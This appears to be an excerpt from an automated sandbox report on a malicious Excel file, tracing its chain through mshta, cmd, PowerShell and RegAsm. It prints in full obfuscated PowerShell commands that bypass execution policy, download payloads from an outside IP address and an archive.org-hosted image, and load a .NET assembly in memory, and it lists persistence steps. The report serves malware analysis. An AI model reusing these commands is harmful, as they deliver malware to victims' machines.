                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: A7130000.0.dr  Initial sample: OLE indicators vbamacros = False
                  Source: PO_304234.xls  Initial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  Source: C:\Windows\System32\mshta.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exe  Process created: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 blob removed]'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,28_2_0041CBE1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899B022D push eax; iretd 7_2_000007FE899B0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899B00BD pushad ; iretd 7_2_000007FE899B00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899D022D push eax; iretd 14_2_000007FE899D0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899D00BD pushad ; iretd 14_2_000007FE899D00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004470B7 push eax; retf 0046h 28_2_004470B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00457186 push ecx; ret 28_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0045E55D push esi; ret 28_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00457AA8 push eax; ret 28_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434EB6 push ecx; ret 28_2_00434EC9

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00406EEB ShellExecuteW,URLDownloadToFileW,28_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,28_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,28_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
